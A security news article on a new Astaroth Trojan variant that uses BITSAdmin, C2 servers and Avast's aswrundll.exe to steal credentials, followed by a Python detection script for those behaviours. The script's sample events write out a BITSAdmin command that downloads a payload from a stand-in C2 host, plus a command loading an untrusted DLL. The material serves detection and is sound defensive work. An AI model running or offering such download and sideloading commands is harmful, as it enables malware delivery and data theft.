A new version of the Astaroth Trojan can exploit vulnerable processes in anti-virus software and services. Researchers on Cybereason's Nocturnus team reported today in a post on their blog that the variant can use security software modules to steal online credentials and personal data.

In its latest form, Astaroth is used in spam campaigns throughout Brazil and Europe, reaching thousands of infections by the end of 2018. The malware spreads through .zip files and malicious links.
Astaroth Trojan: How It Works
Researchers report that the Trojan disguises itself as a JPEG, .GIF, or extensionless file to avoid being detected by security applications. When it runs on a machine, the Microsoft Windows BITSAdmin tool is used to complete the malware download from a command-and-control (C2) server. Once downloaded, the malware runs an XSL script that creates a channel with the C2 server. The script is said to contain functions that help the malware hide from security software, and it also uses the BITSAdmin tool to download malicious payloads from a separate C2 server.

Earlier versions of the Trojan then looked for anti-virus programs, and if Avast was present on an infected system, the malware would stop working. The new Astaroth, however, can fool the anti-virus program and add "a malicious module to one of its processes," according to the researchers. If it detects Avast, it abuses the Avast Software Runtime Dynamic Link Library, which runs modules for Avast with the aswrundll.exe process. The executable, which is similar to Microsoft's rundll32.exe, can run a DLL by calling its exported functions.

The Trojan first appeared in attacks against users in South America during 2017. The malware can steal information from target systems, such as passwords, keystrokes, and any content on the clipboard. Astaroth can also monitor calls if it is installed on a suitable device, and it can terminate various processes. The new strain also uses a `fromCharCode()` deobfuscation method to hide code execution.

Last month, a new survey published by Malwarebytes reported that Trojan and backdoor attacks have more than doubled since the previous year. Spyware attacks have also become more frequent, with an increase of 142% over the same period.
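The BITSAdmin downloads and the aswrundll.exe abuse described above both leave traces in process-creation logs. The following detection sketch is an added example, not code from the researchers' report; the event field names, the trusted Avast install root and the sample events are assumptions constructed for illustration.

```python
import ntpath
import re

# Assumption: default Avast install root; adjust to the paths used in your fleet.
TRUSTED_DLL_ROOTS = ("c:\\program files\\avast software\\",)
URL_RE = re.compile(r"https?://[^\s\"]+", re.I)
# A drive-letter path ending in .dll that does not run into the next path.
DLL_RE = re.compile(r"[a-z]:\\(?:(?![a-z]:\\)[^\"])*?\.dll\b", re.I)

def bitsadmin_remote_fetch(event):
    """Return remote URLs when bitsadmin.exe is asked to download a file."""
    if ntpath.basename(event["image"]).lower() != "bitsadmin.exe":
        return []
    cmd = event["cmdline"].lower()
    if "/transfer" not in cmd and "/addfile" not in cmd:
        return []
    return URL_RE.findall(event["cmdline"])

def aswrundll_foreign_dll(event):
    """Return DLLs passed to aswrundll.exe that sit outside the trusted roots."""
    if ntpath.basename(event["image"]).lower() != "aswrundll.exe":
        return []
    dlls = DLL_RE.findall(event["cmdline"])
    return [d for d in dlls if not d.lower().startswith(TRUSTED_DLL_ROOTS)]

def triage(events):
    """Return (index, rule name, evidence) for every event matching a rule."""
    hits = []
    for i, ev in enumerate(events):
        for rule in (bitsadmin_remote_fetch, aswrundll_foreign_dll):
            evidence = rule(ev)
            if evidence:
                hits.append((i, rule.__name__, evidence))
    return hits

# Constructed process-creation events, not taken from a real incident.
AVAST = r"C:\Program Files\Avast Software\Avast"
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\bitsadmin.exe", "cmdline":
     r"bitsadmin /transfer j1 /download http://c2.example/p.gif C:\Users\Public\p.gif"},
    {"image": r"C:\Windows\System32\bitsadmin.exe", "cmdline": "bitsadmin /list /allusers"},
    {"image": AVAST + r"\aswRunDll.exe",
     "cmdline": r'aswRunDll.exe "C:\Users\Public\Libraries\x.dll"'},
    {"image": AVAST + r"\aswRunDll.exe",
     "cmdline": 'aswRunDll.exe "' + AVAST + r'\example.dll"'},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Legitimate software updaters also use BITS, so hits from the first rule are triage leads to correlate with the download destination and the parent process rather than verdicts.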